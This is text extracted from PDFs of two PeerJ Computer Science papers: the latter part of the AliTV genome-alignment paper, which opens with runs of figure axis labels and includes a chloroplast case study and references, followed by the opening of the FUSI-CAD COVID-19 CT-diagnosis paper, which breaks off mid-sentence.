30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 0 bp10000 bp20000 bp30000 bp40000 bp50000 bp60000 bp70000 bp80000 bp90000 bp100000 bp110000 bp120000 bp130000 bp140000 bp150000 bp160000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 0 bp10000 bp20000 bp30000 bp40000 bp50000 bp60000 bp70000 bp80000 bp90000 bp100000 bp110000 bp120000 bp130000 bp140000 bp150000 bp160000 bp N.tabacum O.europaea L.philippensis S.americana* C.phelypaea* E.virginiana* O.gracilis* 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 110000 bp120000 bp130000 bp140000 bp150000 bp160000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 110000 bp120000 bp130000 bp140000 bp150000 bp160000 bp N.tabacum O.europaea L.philippensis S.americana* C.phelypaea* E.virginiana* O.gracilis* ndh ycf invertedRepeat 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 0 bp10000 bp20000 bp30000 bp40000 bp50000 bp60000 bp70000 bp80000 bp90000 bp100000 bp110000 bp120000 bp130000 bp140000 bp150000 bp160000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 0 bp10000 bp20000 bp30000 bp40000 bp50000 bp60000 bp70000 bp80000 bp90000 bp100000 bp110000 bp120000 bp130000 bp140000 bp150000 bp160000 bp O.europaea L.philippensis C.phelypaea* E.virginiana* O.gracilis* S.americana* N.tabacum 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 0 bp10000 bp20000 bp30000 bp40000 bp50000 bp60000 bp70000 bp80000 bp90000 bp100000 bp110000 bp120000 bp130000 bp140000 bp150000 bp160000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 0 bp10000 bp20000 bp30000 bp40000 bp50000 bp60000 bp70000 bp80000 bp90000 bp100000 bp110000 bp120000 bp130000 bp140000 bp150000 bp160000 bp N.tabacum O.europaea L.philippensis S.americana* C.phelypaea* E.virginiana* O.gracilis* A B C D Figure 1 Whole genome alignment of seven chloroplasts visualized by AliTV. Species names were italicized and parasites marked with asterisks ex post. (A) Default layout with a phylogenetic tree on the left-hand side and genomes represented by co-linear horizontal bars on the right; genes and inverted repeats are displayed as rectangles and arrows, respectively; colored ribbons connect corresponding regions in the alignment. (B–D) Customized layouts: (B) reordered genomes, non-parasitic plants at the top and holo-parasitic plants at the bottom; (C) links filtered by identity (only those with 50%–90% identity are drawn); (D) zoom in on a potential segmental duplication (red ‘X’-shaped links) in the top four genomes. size of S. americana is similar to that of the non-parasitic plants. This can be explained by the life style of S. americana which is hemi-parasitic in contrast to the other parasitic plants which are holo-parasites. The features shown are the IR regions as arrows, the hypothetical chloroplast open reading frames as orange and the genes of the ndh family as pink rectangles. First, it can be seen that there is a big variation in size of the inverted repeats. While the IR of Orobanche gracilis is the shortest with roughly 5,000 bp, that of S. americana is the largest with roughly 35,000 bp. Second, there are less genes of the ndh family on Cistanche phelypaea, Epifagus virginiana, O. gracilis, and S. americana. Members of the ndh gene family encode subunits of the NADH dehydrogenase-like complex, which is involved in chlororespiration (Martín & Sabater, 2010). However, they are not required for plant growth under optimal conditions (Burrows, 1998). The absence of ndh genes Ankenbrand et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.116 5/10 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.116 in chloroplasts of parasitic plants has been studied in detail in Wicke et al. (2013). Loss of ndh genes has also been reported for photosynthetic plants such as some conifers and orchids (Wakasugi et al., 1994; Kim et al., 2015). Looking at the pairwise similarities of adjacent genomes, it is apparent that the non-parasitic plants (e.g., Olea europaea and Lindenbergia philippensis) have high overall sequence identity. In contrast, the sequence similarity within parasitic plants is lower. This observation can help framing a hypothesis about the evolutionary pressure on chloroplasts of parasitic plants. Another interesting observation is the distribution of missing regions of C. phelypaea in comparison to L. philippensis. Missing regions are distributed all over the genome and the order of the remaining parts remains stable. Wicke et al. (2013) describe an inversion in the large single copy region of S. americana compared to non-parasitic plants which is clearly visible by the link to N. tabacum around the 115 kbp position. All these observations can be made by simply looking at the raw figure created by alitv.pl and visualized by AliTV. However the figure can be analyzed interactively in more detail. One shortcoming of the linear representation of whole genome alignments is the limited comparability of non-adjacent sequences. Therefore, AliTV provides a way for the user to re-order the genomes on the figure (Fig. 1B). If reordering causes inconsistencies with the phylogenetic tree, the tree is hidden and a warning message is displayed. Furthermore, the links can be filtered by their alignment identity. The default setting is to display only links with minimal identity of 70%. But sometimes it might be interesting to look at regions with less similarity. To see these regions it is also important to hide large regions with high similarity. This can be achieved by changing the identity via a slider (Fig. 1C). After setting the identity range to 50%–90% red ‘X’-shaped links between N. tabacum, O. europaea, L. philippensis, and S. americana become apparent. For detailed inspection of regions of interest, AliTV provides a zoom function (Fig. 1D). This way the exact location of the alignments can be traced to the locations of psaA and psaB. Moreover AliTV provides functions like alignment length filtering, selective hiding of sequences, links and features, change of orientation (reverse complement) and rotation of circular chromosomes. Finally, it is possible to tweak many graphical parameters, such as colors, labels or spacing, directly via the interface to produce a publication quality figure which can be saved in SVG format. Furthermore, the current state can be saved in JSON format in order to share it with collaborators or continue the work with AliTV at a later time. CONCLUSION The case study demonstrates the suitability of AliTV as a tool for visualizing and analyzing whole genome comparisons. AliTV can be used to easily create a figure that show cases many genomic features at once. Furthermore, the rich interactive features enable the exploratory analysis and discovery of previously unknown features. Thus, novel hypotheses can be generated that can then be validated with experimental methods. Therefore, AliTV is a useful tool that will help scientists to find biologically meaningful information in the vast amount of genomic data. Ankenbrand et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.116 6/10 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.116 ACKNOWLEDGEMENTS We would like to thank Felix Bemm for fruitful discussions about file formats and must-have-features during the development of AliTV and for supervising MJA during his bachelor thesis. ADDITIONAL INFORMATION AND DECLARATIONS Funding MJA was supported by a grant of the German Excellence Initiative to the Graduate School of Life Sciences, University of Würzburg. The publication fee was funded by the MIT Libraries. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: German Excellence Initiative to the Graduate School of Life Sciences, University of Würzburg. MIT Libraries. Competing Interests The authors declare there are no competing interests. Author Contributions • Markus J. Ankenbrand and Frank Förster conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Sonja Hohlfeld performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Thomas Hackl conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Github: https://github.com/AliTVTeam/AliTV. REFERENCES Alikhan N-F, Petty NK, Ben Zakour NL, Beatson SA. 2011. BLAST ring image gen- erator (BRIG): simple prokaryote genome comparisons. BMC Genomics 12:402 DOI 10.1186/1471-2164-12-402. Ankenbrand et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.116 7/10 https://peerj.com https://github.com/AliTVTeam/AliTV http://dx.doi.org/10.1186/1471-2164-12-402 http://dx.doi.org/10.7717/peerj-cs.116 Avrani S, Wurtzel O, Sharon I, Sorek R, Lindell D. 2011. Genomic island variability facilitates Prochlorococcus—virus coexistence. Nature 474(7353):604–608 DOI 10.1038/nature10172. Benson DA, Cavanaugh M, Clark K, Karsch-Mizrachi I, Lipman DJ, Ostell J, Say- ers EW. 2013. GenBank. Nucleic Acids Research 41(Database issue):D36–D42 DOI 10.1093/nar/gks1195. Burrows PA. 1998. Identification of a functional respiratory complex in chloroplasts through analysis of tobacco mutants containing disrupted plastid ndh genes. The EMBO Journal 17(4):868–876 DOI 10.1093/emboj/17.4.868. Carver T, Berriman M, Tivey A, Patel C, Böhme U, Barrell BG, Parkhill J, Ra- jandream M-A. 2008. Artemis and ACT: viewing, annotating and comparing sequences stored in a relational database. Bioinformatics 24(23):2672–2676 DOI 10.1093/bioinformatics/btn529. Chin C-S, Alexander DH, Marks P, Klammer AA, Drake J, Heiner C, Clum A, Copeland A, Huddleston J, Eichler EE, Turner SW, Korlach J. 2013. Nonhybrid, finished microbial genome assemblies from long-read SMRT sequencing data. Nature Methods 10:563–569 DOI 10.1038/nmeth.2474. Coleman ML, Sullivan MB, Martiny AC, Steglich C, Barry K, Delong EF, Chisholm SW. 2006. Genomic islands and the ecology and evolution of Prochlorococcus. Science 311(5768):1768–1770 DOI 10.1126/science.1122050. Corpas M, Jimenez R, Carbon SJ, García A, Garcia L, Goldberg T, Gomez J, Kalderimis A, Lewis SE, Mulvany I, Pawlik A, Rowland F, Salazar G, Schreiber F, Sillitoe I, Spooner WH, Thanki A, Villaveces JM, Yachdav G, Hermjakob H. 2014. BioJS: an open source standard for biological visualisation—its status in 2014. F1000 Research 3:55 DOI 10.12688/f1000research.3-55.v1. Darling A. CE, Mau B, Blattner FR, Perna NT. 2004. Mauve: multiple alignment of con- served genomic sequence with rearrangements. Genome Research 14(7):1394–1403 DOI 10.1101/gr.2289704. Didelot X, Méric G, Falush D. 2012. Impact of homologous and non-homologous recombination in the genomic evolution of Escherichia coli. BMC Genomics 13:256 DOI 10.1186/1471-2164-13-256. Fischer MG. 2015. Virophages go nuclear in the marine alga Bigelowiella natans. Proceedings of the National Academy of Sciences of the United States of America 112(38):11750–11751 DOI 10.1073/pnas.1515142112. Guy L, Kultima JR, Andersson S. GE. 2010. genoPlotR: comparative gene and genome visualization in R. Bioinformatics 26(18):2334–2335 DOI 10.1093/bioinformatics/btq413. Hackl T, Hedrich R, Schultz J, Förster F. 2014. proovread: large-scale high-accuracy PacBio correction through iterative short read consensus. Bioinformatics 30(21):3004–3011 DOI 10.1093/bioinformatics/btu392. Hallin PF, Binnewies TT, Ussery DW. 2008. The genome BLASTatlas-a GeneWiz extension for visualization of whole-genome homology. Molecular BioSystems 4(5):363–371 DOI 10.1039/b717118h. Ankenbrand et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.116 8/10 https://peerj.com http://dx.doi.org/10.1038/nature10172 http://dx.doi.org/10.1093/nar/gks1195 http://dx.doi.org/10.1093/emboj/17.4.868 http://dx.doi.org/10.1093/bioinformatics/btn529 http://dx.doi.org/10.1038/nmeth.2474 http://dx.doi.org/10.1126/science.1122050 http://dx.doi.org/10.12688/f1000research.3-55.v1 http://dx.doi.org/10.1101/gr.2289704 http://dx.doi.org/10.1186/1471-2164-13-256 http://dx.doi.org/10.1073/pnas.1515142112 http://dx.doi.org/10.1093/bioinformatics/btq413 http://dx.doi.org/10.1093/bioinformatics/btu392 http://dx.doi.org/10.1039/b717118h http://dx.doi.org/10.7717/peerj-cs.116 Harris RS. 2007. Improved pairwise alignment of genomic DNA. PhD thesis, Pennsylva- nia State University. Herbig A, Jäger G, Battke F, Nieselt K. 2012. GenomeRing: alignment visual- ization based on SuperGenome coordinates. Bioinformatics 28(12):i7–i15 DOI 10.1093/bioinformatics/bts217. Kashtan N, Roggensack SE, Rodrigue S, Thompson JW, Biller SJ, Coe A, Ding H, Marttinen P, Malmstrom RR, Stocker R, Follows MJ, Stepanauskas R, Chisholm SW. 2014. Single-cell genomics reveals hundreds of coexisting subpopulations in wild prochlorococcus. Science 344(6182):416–420 DOI 10.1126/science.1248575. Kim HT, Kim JS, Moore MJ, Neubig KM, Williams NH, Whitten WM, Kim J-H. 2015. Seven new complete plastome sequences reveal rampant independent loss of the ndh gene family across orchids and associated instability of the in- verted repeat/small single-copy region boundaries. PLOS ONE 10(11):e0142215 DOI 10.1371/journal.pone.0142215. Kunnimalaiyaan M, Nielsen BL. 1997. Fine mapping of replication origins (ori A and ori B) in Nicotiana tabacum chloroplast DNA. Nucleic Acids Research 25(18):3681–3686 DOI 10.1093/nar/25.18.3681. Langille M, Hsiao W, Brinkman F. 2008. Evaluation of genomic island predic- tors using a comparative genomics approach. BMC Bioinformatics 9:329 DOI 10.1186/1471-2105-9-329. Martín M, Sabater B. 2010. Plastid ndh genes in plant evolution. Plant Physiology and Biochemistry 48(8):636–645 DOI 10.1016/j.plaphy.2010.04.009. Messina R. 2010. Olea europaea chloroplast, complete genome. Available at http://www.ncbi.nlm.nih.gov/nuccore/NC_013707.2 (accessed on 30 June 2015). Namouchi A, Didelot X, Schöck U, Gicquel B. 2012. After the bottleneck: genome- wide diversification of the Mycobacterium tuberculosis complex by muta- tion, recombination, and natural selection. Genome Research 22:721–734 DOI 10.1101/gr.129544.111. Pagani I, Liolios K, Jansson J, Chen I-MA, Smirnova T, Nosrat B, Markowitz VM, Kyrpides NC. 2012. The genomes online database (GOLD) v.4: status of genomic and metagenomic projects and their associated metadata. Nucleic Acids Research 40(Database issue):D571–D579 DOI 10.1093/nar/gkr1100. Rasko DA, Dale WR, Sahl JW, Bashir A, Boisen N, Scheutz F, Paxinos EE, Sebra R, Chin C-S, Iliopoulos D, Klammer A, Peluso P, Lee L, Kislyuk AO, Bullard J, Kasarskis A, Wang S, Eid J, Rank D, Redman JC, Steyert SR, Frimodt-møller J, Struve C, Petersen AM, Krogfeld KA, Nataro JP, Schadt EE, Waldor MK. 2011. Origins of the E. coli strain causing an outbreak of hemolytic-uremic syndrome in Germany. The New England Journal of Medicine 365(8):709–717 DOI 10.1056/NEJMoa1106920. Riley DR, Angiuoli SV, Crabtree J, Dunning Hotopp JC, Tettelin H. 2012. Using Sybil for interactive comparative genomics of microbes on the web. Bioinformatics 28(2):160–166 DOI 10.1093/bioinformatics/btr652. Salzberg SL, Phillippy AM, Zimin AV, Puiu D, Magoc T, Koren S, Treangen T, Schatz MC, Delcher AL, Roberts M, Marcais G, Pop M, Yorke JA. 2011. GAGE: a critical Ankenbrand et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.116 9/10 https://peerj.com http://dx.doi.org/10.1093/bioinformatics/bts217 http://dx.doi.org/10.1126/science.1248575 http://dx.doi.org/10.1371/journal.pone.0142215 http://dx.doi.org/10.1093/nar/25.18.3681 http://dx.doi.org/10.1186/1471-2105-9-329 http://dx.doi.org/10.1016/j.plaphy.2010.04.009 http://www.ncbi.nlm.nih.gov/nuccore/NC_013707.2 http://dx.doi.org/10.1101/gr.129544.111 http://dx.doi.org/10.1093/nar/gkr1100 http://dx.doi.org/10.1056/NEJMoa1106920 http://dx.doi.org/10.1093/bioinformatics/btr652 http://dx.doi.org/10.7717/peerj-cs.116 evaluation of genome assemblies and assembly algorithms. Genome Research 22(3):557–567 DOI 10.1101/gr.131383.111. Sayers EW, Barrett T, Benson DA, Bryant SH, Canese K, Chetvernin V, Church DM, DiCuccio M, Edgar R, Federhen S, Feolo M, Geer LY, Helmberg W, Kapustin Y, Landsman D, Lipman DJ, Madden TL, Maglott DR, Miller V, Mizrachi I, Ostell J, Pruitt KD, Schuler GD, Sequeira E, Sherry ST, Shumway M, Sirotkin K, Souvorov A, Starchenko G, Tatusova TA, Wagner L, Yaschenko E, Ye J. 2009. Database resources of the National Center for Biotechnology Information. Nucleic Acids Research 37(Database issue):D5–D15 DOI 10.1093/nar/gkn741. Schwarz RF, Ng CKY, Cooke SL, Newman S, Temple J, Piskorz AM, Gale D, Sayal K, Murtaza M, Baldwin PJ, Rosenfeld N, Earl HM, Sala E, Jimenez-Linan M, Parkinson CA, Markowetz F, Brenton JD. 2015. Spatial and temporal heterogeneity in high-grade serous ovarian cancer: a phylogenetic analysis. PLOS Medicine 12(2):e1001789 DOI 10.1371/journal.pmed.1001789. Stajich JE, Block D, Boulez K, Brenner SE, Chervitz SA, Dagdigian C, Fuellen G, Gilbert JGR, Korf I, Lapp H, Lehväslaiho H, Matsalla C, Mungall CJ, Osborne BI, Pocock MR, Schattner P, Senger M, Stein LD, Stupka E, Wilkinson MD, Birney E. 2002. The Bioperl toolkit: perl modules for the life sciences. Genome Research 12(10):1611–1618 DOI 10.1101/gr.361602. Sullivan MJ, Petty NK, Beatson SA. 2011. Easyfig: a genome comparison visualizer. Bioinformatics 27(7):1009–1010 DOI 10.1093/bioinformatics/btr039. Touchon M, Rocha E. 2007. Causes of insertion sequences abundance in prokaryotic genomes. Molecular Biology and Evolution 24(4):969–981 DOI 10.1093/molbev/msm014. Turnbaugh PJ, Ley RE, Hamady M, Fraser-Liggett CM, Knight R, Gordon JI. 2007. The human microbiome project. Nature 449(7164):804–810 DOI 10.1038/nature06244. Vanneste K, Baele G, Maere S, Peer YVD. 2014. Analysis of 41 plant genomes supports a wave of successful genome duplications in association with the Cretaceous– Paleogene boundary. Genome Research 24(8):1334–1347 DOI 10.1101/gr.168997.113. Wakasugi T, Tsudzuki J, Ito S, Nakashima K, Tsudzuki T, Sugiura M. 1994. Loss of all ndh genes as determined by sequencing the entire chloroplast genome of the black pine Pinus thunbergii. Proceedings of the National Academy of Sciences of the United States of America 91(21):9794–9798 DOI 10.1073/pnas.91.21.9794. Wicke S, Müller KF, De Pamphilis CW, Quandt D, Wickett NJ, Zhang Y, Renner SS, Schneeweiss GM. 2013. Mechanisms of functional and physical genome reduction in photosynthetic and nonphotosynthetic parasitic plants of the broomrape family. The Plant Cell 25(10):3711–3725 DOI 10.1105/tpc.113.113373. Wolfe KH, Morden CW, Palmer JD. 1992. Function and evolution of a minimal plastid genome from a nonphotosynthetic parasitic plant. Proceedings of the National Academy of Sciences of the United States of America 89(22):10648–10652 DOI 10.1073/pnas.89.22.10648. Yahara K, Didelot X, Ansari M, Sheppard S. 2014. Efficient inference of recombination hot regions in bacterial genomes. Molecular Biology and Evolution 31(6):1593–1605 DOI 10.1093/molbev/msu082. Ankenbrand et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.116 10/10 https://peerj.com http://dx.doi.org/10.1101/gr.131383.111 http://dx.doi.org/10.1093/nar/gkn741 http://dx.doi.org/10.1371/journal.pmed.1001789 http://dx.doi.org/10.1101/gr.361602 http://dx.doi.org/10.1093/bioinformatics/btr039 http://dx.doi.org/10.1093/molbev/msm014 http://dx.doi.org/10.1038/nature06244 http://dx.doi.org/10.1101/gr.168997.113 http://dx.doi.org/10.1073/pnas.91.21.9794 http://dx.doi.org/10.1105/tpc.113.113373 http://dx.doi.org/10.1073/pnas.89.22.10648 http://dx.doi.org/10.1093/molbev/msu082 http://dx.doi.org/10.7717/peerj-cs.116 work_oavbptqpunch5jy27k3m3zb5yi ---- FUSI-CAD: Coronavirus (COVID-19) diagnosis based on the fusion of CNNs and handcrafted features FUSI-CAD: Coronavirus (COVID-19) diagnosis based on the fusion of CNNs and handcrafted features Dina A. Ragab and Omneya Attallah Electronics and Communications Engineering Department, Arab Academy for Science, Technology, and Maritime Transport (AASTMT), Alexandria, Egypt ABSTRACT The precise and rapid diagnosis of coronavirus (COVID-19) at the very primary stage helps doctors to manage patients in high workload conditions. In addition, it prevents the spread of this pandemic virus. Computer-aided diagnosis (CAD) based on artificial intelligence (AI) techniques can be used to distinguish between COVID-19 and non-COVID-19 from the computed tomography (CT) imaging. Furthermore, the CAD systems are capable of delivering an accurate faster COVID-19 diagnosis, which consequently saves time for the disease control and provides an efficient diagnosis compared to laboratory tests. In this study, a novel CAD system called FUSI-CAD based on AI techniques is proposed. Almost all the methods in the literature are based on individual convolutional neural networks (CNN). Consequently, the FUSI-CAD system is based on the fusion of multiple different CNN architectures with three handcrafted features including statistical features and textural analysis features such as discrete wavelet transform (DWT), and the grey level co-occurrence matrix (GLCM) which were not previously utilized in coronavirus diagnosis. The SARS-CoV-2 CT-scan dataset is used to test the performance of the proposed FUSI-CAD. The results show that the proposed system could accurately differentiate between COVID-19 and non-COVID-19 images, as the accuracy achieved is 99%. Additionally, the system proved to be reliable as well. This is because the sensitivity, specificity, and precision attained to 99%. In addition, the diagnostics odds ratio (DOR) is ≥ 100. Furthermore, the results are compared with recent related studies based on the same dataset. The comparison verifies the competence of the proposed FUSI-CAD over the other related CAD systems. Thus, the novel FUSI-CAD system can be employed in real diagnostic scenarios for achieving accurate testing for COVID-19 and avoiding human misdiagnosis that might exist due to human fatigue. It can also reduce the time and exertion made by the radiologists during the examination process. Subjects Artificial Intelligence, Computer Aided Design, Computer Vision Keywords Computer-aided diagnosis (CAD), Convolution neural networks (CNN), Coronavirus (COVID-19), Discrete wavelet transform (DWT), Grey level co-occurrence matrix (GLCM) INTRODUCTION The novel virus known as the severe acute respiratory syndrome coronavirus 2 (SARS-CoV-2) has emerged in December 2019 in Wuhan, China. Patients diseased with SARS-CoV-2 can experience a medical condition known as coronavirus diseases 2019 How to cite this article Ragab DA, Attallah O. 2020. FUSI-CAD: Coronavirus (COVID-19) diagnosis based on the fusion of CNNs and handcrafted features. PeerJ Comput. Sci. 6:e306 DOI 10.7717/peerj-cs.306 Submitted 31 August 2020 Accepted 30 September 2020 Published 12 October 2020 Corresponding authors Dina A. Ragab, dinaragab@aast.edu Omneya Attallah, o.attallah@aast.edu Academic editor Robertas Damaševičius Additional Information and Declarations can be found on page 25 DOI 10.7717/peerj-cs.306 Copyright 2020 Ragab and Attallah Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.306 mailto:dinaragab@�aast.�edu mailto:o.�attallah@�aast.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.306 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ (COVID-19). This new coronavirus has quickly spread to other zones in China and other countries with significant morbidity and mortality rates. On April 20, 2020, more than 84,000 COVID-19 infected patients have been verified in China, and more than 2.3 million patients worldwide (Dong et al., 2020). COVID-19 may lead to critical respiratory illness, acute pneumonia, numerous organs failure, and even death (Cheng et al., 2020). For this reason, the early detection of this virus is essential, as it is achieving a primary initial assessment so that the succeeding arrangement of suitable treatments and follow-ups can be set in advance. Pandemic COVID-19 has led to a rapid increase in the number of new patients. Consequently, an overload in hospital capacity occurred, and healthcare management became a difficult task (Wu et al., 2020; Paules, Marston & Fauci, 2020). In addition, the doctors and nurses are at risk of being infected, and thus they will not be capable of helping patients and managing their jobs (Butt et al., 2020). Therefore, a rapid and accurate diagnostic tool is crucial to help doctors in managing their patients. The standard way of screening infected patients is known as the reverse-transcription polymerase chain reaction (RT-PCR) testing (Dong et al., 2020). Although RT-PCR is the common method to diagnose COVID-19 cases, it has some limitations. First, the sensitivity of the RT-PCR test is not quite high, and therefore COVID-19 disease may not be completely omitted, despite if RT-PCR outcomes from a suspected case are negative (Ai et al., 2020). Moreover, the inadequate quantity and firm necessities for laboratory settings would critically postpone precise identification of suspected individuals, which has modeled extraordinary challenges to avoid the propagation of the disease worldwide, specifically in the middle of the epidemic region (Xie et al., 2020). Thus, medical imaging, in specific, chest-computed tomography (CT), is preferred as another tool in the diagnosis and management of the novel coronavirus. CT offers a faster and simpler solution for medical diagnosis of COVID-19. It is used as well in observing of disease progression and the assessment of treatment efficiency (Iwasawa et al., 2020; Attallah et al., 2017a). CT is considered as the main element of the diagnostic and treatment process for suspected cases due to its manifestations, which have been reported in several recent articles (Lei et al., 2020; Chung et al., 2020; Song et al., 2020a). Moreover, it can be used alone by the radiologists due to the overlap of the appearance of COVID-19 with other types of pneumonia, which challenges the examination process (Shi, Han & Zheng, 2020). Furthermore, manual examination using CT images needs lots of manual employment time-consuming. Therefore, the health industry is considering other new technologies to screen and control the spread of the novel coronavirus pandemic. Artificial intelligence (AI) is an example of such technologies that can tackle the propagation of such disease, recognize patients at risk, control this virus in real-time, and automatically detect and diagnose suspected cases (Vaishya et al., 2020). Machine learning (ML) and deep learning (DL) are classes of AI, which have the potential to enhance the diagnosis and treatment planning of COVID-19 cases, being an evidence-based medical tool (Attallah et al., 2017b, 2017a; Karthikesalingam et al., 2015). Computer-aided diagnosis (CAD) systems based on AI techniques such as ML and specifically DL have been described as an effective tool to diagnose and detect numerous Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 2/30 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ diseases and abnormalities from medical images (Ragab, Sharkas & Attallah, 2019; Attallah, Sharkas & Gadelkarim, 2019; Ragab et al., 2019; Attallah, Sharkas & Gadelkarim, 2020; Attallah, Gadelkarim & Sharkas, 2018). The CAD systems were used to diagnose several lung diseases such as tuberculosis (Ke et al., 2019). The authors in Wei et al. (2019b) and Capizzi et al. (2019) used CT images to classify lung nodule images. Recently, the CAD systems have been used for diagnosing and identifying COVID-19 disease from other types of 